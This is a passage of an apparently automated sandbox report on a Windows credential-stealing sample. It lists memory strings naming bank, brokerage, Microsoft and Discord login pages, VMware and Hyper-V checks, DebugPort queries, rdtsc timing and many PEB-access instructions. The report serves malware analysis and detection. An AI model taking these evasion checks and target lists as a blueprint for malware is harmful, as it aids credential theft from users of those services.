Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rdVMware20,11696487552
Source: -2-2FfKI.13.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: -2-2FfKI.13.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: -2-2FfKI.13.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: -2-2FfKI.13.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: -2-2FfKI.13.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF360000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF360000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word management pageVMware20,11696487552
Source: -2-2FfKI.13.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ers.comVMware20,11696487552
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5hx
Source: -2-2FfKI.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: -2-2FfKI.13.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: -2-2FfKI.13.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: -2-2FfKI.13.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: -2-2FfKI.13.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002779000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -2-2FfKI.13.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (_1ers.comVMware20,11696487552
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l.comVMware20,11696487552h
Source: -2-2FfKI.13.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: -2-2FfKI.13.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: -2-2FfKI.13.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: -2-2FfKI.13.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kers.comVMware20,11696487552}
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552~
Source: -2-2FfKI.13.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: -2-2FfKI.13.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: -2-2FfKI.13.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: -2-2FfKI.13.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: -2-2FfKI.13.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: SyncHost.exe, 0000000D.00000002.2687286234.00000000076D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rs - HKVMware20,11696487552]
Source: -2-2FfKI.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: -2-2FfKI.13.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: SYYSBomrTxWSggG.exe, 00000011.00000002.3367996635.000000000111F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: -2-2FfKI.13.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: -2-2FfKI.13.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: -2-2FfKI.13.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: -2-2FfKI.13.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: -2-2FfKI.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: -2-2FfKI.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: -2-2FfKI.13.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 10_2_0106D1C0 rdtsc

10_2_0106D1C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 10_2_004173E3 LdrLoadDll,

10_2_004173E3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEC0F0 mov eax, dword ptr fs:[00000030h]	10_2_00FEC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109A118 mov ecx, dword ptr fs:[00000030h]	10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109A118 mov eax, dword ptr fs:[00000030h]	10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109A118 mov eax, dword ptr fs:[00000030h]	10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109A118 mov eax, dword ptr fs:[00000030h]	10_2_0109A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF80E9 mov eax, dword ptr fs:[00000030h]	10_2_00FF80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEA0E3 mov ecx, dword ptr fs:[00000030h]	10_2_00FEA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B0115 mov eax, dword ptr fs:[00000030h]	10_2_010B0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01020124 mov eax, dword ptr fs:[00000030h]	10_2_01020124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01083140 mov eax, dword ptr fs:[00000030h]	10_2_01083140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01083140 mov eax, dword ptr fs:[00000030h]	10_2_01083140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01083140 mov eax, dword ptr fs:[00000030h]	10_2_01083140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01084144 mov eax, dword ptr fs:[00000030h]	10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01084144 mov eax, dword ptr fs:[00000030h]	10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01084144 mov ecx, dword ptr fs:[00000030h]	10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01084144 mov eax, dword ptr fs:[00000030h]	10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01084144 mov eax, dword ptr fs:[00000030h]	10_2_01084144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01088158 mov eax, dword ptr fs:[00000030h]	10_2_01088158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C5152 mov eax, dword ptr fs:[00000030h]	10_2_010C5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF5096 mov eax, dword ptr fs:[00000030h]	10_2_00FF5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01089179 mov eax, dword ptr fs:[00000030h]	10_2_01089179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FED08D mov eax, dword ptr fs:[00000030h]	10_2_00FED08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF208A mov eax, dword ptr fs:[00000030h]	10_2_00FF208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AC188 mov eax, dword ptr fs:[00000030h]	10_2_010AC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AC188 mov eax, dword ptr fs:[00000030h]	10_2_010AC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01030185 mov eax, dword ptr fs:[00000030h]	10_2_01030185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01047190 mov eax, dword ptr fs:[00000030h]	10_2_01047190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107019F mov eax, dword ptr fs:[00000030h]	10_2_0107019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107019F mov eax, dword ptr fs:[00000030h]	10_2_0107019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107019F mov eax, dword ptr fs:[00000030h]	10_2_0107019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107019F mov eax, dword ptr fs:[00000030h]	10_2_0107019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A11A4 mov eax, dword ptr fs:[00000030h]	10_2_010A11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A11A4 mov eax, dword ptr fs:[00000030h]	10_2_010A11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A11A4 mov eax, dword ptr fs:[00000030h]	10_2_010A11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A11A4 mov eax, dword ptr fs:[00000030h]	10_2_010A11A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF2050 mov eax, dword ptr fs:[00000030h]	10_2_00FF2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100B1B0 mov eax, dword ptr fs:[00000030h]	10_2_0100B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C51CB mov eax, dword ptr fs:[00000030h]	10_2_010C51CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B61C3 mov eax, dword ptr fs:[00000030h]	10_2_010B61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B61C3 mov eax, dword ptr fs:[00000030h]	10_2_010B61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102D1D0 mov eax, dword ptr fs:[00000030h]	10_2_0102D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102D1D0 mov ecx, dword ptr fs:[00000030h]	10_2_0102D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106E1D0 mov ecx, dword ptr fs:[00000030h]	10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0106E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEA020 mov eax, dword ptr fs:[00000030h]	10_2_00FEA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEC020 mov eax, dword ptr fs:[00000030h]	10_2_00FEC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C61E5 mov eax, dword ptr fs:[00000030h]	10_2_010C61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010151EF mov eax, dword ptr fs:[00000030h]	10_2_010151EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010971F9 mov esi, dword ptr fs:[00000030h]	10_2_010971F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010201F8 mov eax, dword ptr fs:[00000030h]	10_2_010201F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01074000 mov ecx, dword ptr fs:[00000030h]	10_2_01074000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF51ED mov eax, dword ptr fs:[00000030h]	10_2_00FF51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100E016 mov eax, dword ptr fs:[00000030h]	10_2_0100E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100E016 mov eax, dword ptr fs:[00000030h]	10_2_0100E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100E016 mov eax, dword ptr fs:[00000030h]	10_2_0100E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100E016 mov eax, dword ptr fs:[00000030h]	10_2_0100E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B903E mov eax, dword ptr fs:[00000030h]	10_2_010B903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B903E mov eax, dword ptr fs:[00000030h]	10_2_010B903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B903E mov eax, dword ptr fs:[00000030h]	10_2_010B903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B903E mov eax, dword ptr fs:[00000030h]	10_2_010B903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01086030 mov eax, dword ptr fs:[00000030h]	10_2_01086030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101B052 mov eax, dword ptr fs:[00000030h]	10_2_0101B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109705E mov ebx, dword ptr fs:[00000030h]	10_2_0109705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109705E mov eax, dword ptr fs:[00000030h]	10_2_0109705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01076050 mov eax, dword ptr fs:[00000030h]	10_2_01076050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEA197 mov eax, dword ptr fs:[00000030h]	10_2_00FEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEA197 mov eax, dword ptr fs:[00000030h]	10_2_00FEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEA197 mov eax, dword ptr fs:[00000030h]	10_2_00FEA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107106E mov eax, dword ptr fs:[00000030h]	10_2_0107106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C5060 mov eax, dword ptr fs:[00000030h]	10_2_010C5060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov ecx, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01001070 mov eax, dword ptr fs:[00000030h]	10_2_01001070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101C073 mov eax, dword ptr fs:[00000030h]	10_2_0101C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106D070 mov ecx, dword ptr fs:[00000030h]	10_2_0106D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107D080 mov eax, dword ptr fs:[00000030h]	10_2_0107D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107D080 mov eax, dword ptr fs:[00000030h]	10_2_0107D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEF172 mov eax, dword ptr fs:[00000030h]	10_2_00FEF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101D090 mov eax, dword ptr fs:[00000030h]	10_2_0101D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101D090 mov eax, dword ptr fs:[00000030h]	10_2_0101D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102909C mov eax, dword ptr fs:[00000030h]	10_2_0102909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010880A8 mov eax, dword ptr fs:[00000030h]	10_2_010880A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEC156 mov eax, dword ptr fs:[00000030h]	10_2_00FEC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF6154 mov eax, dword ptr fs:[00000030h]	10_2_00FF6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF6154 mov eax, dword ptr fs:[00000030h]	10_2_00FF6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF7152 mov eax, dword ptr fs:[00000030h]	10_2_00FF7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B60B8 mov eax, dword ptr fs:[00000030h]	10_2_010B60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B60B8 mov ecx, dword ptr fs:[00000030h]	10_2_010B60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE9148 mov eax, dword ptr fs:[00000030h]	10_2_00FE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE9148 mov eax, dword ptr fs:[00000030h]	10_2_00FE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE9148 mov eax, dword ptr fs:[00000030h]	10_2_00FE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE9148 mov eax, dword ptr fs:[00000030h]	10_2_00FE9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov ecx, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov ecx, dword ptr fs:[00000030h]	10_2_010070C0
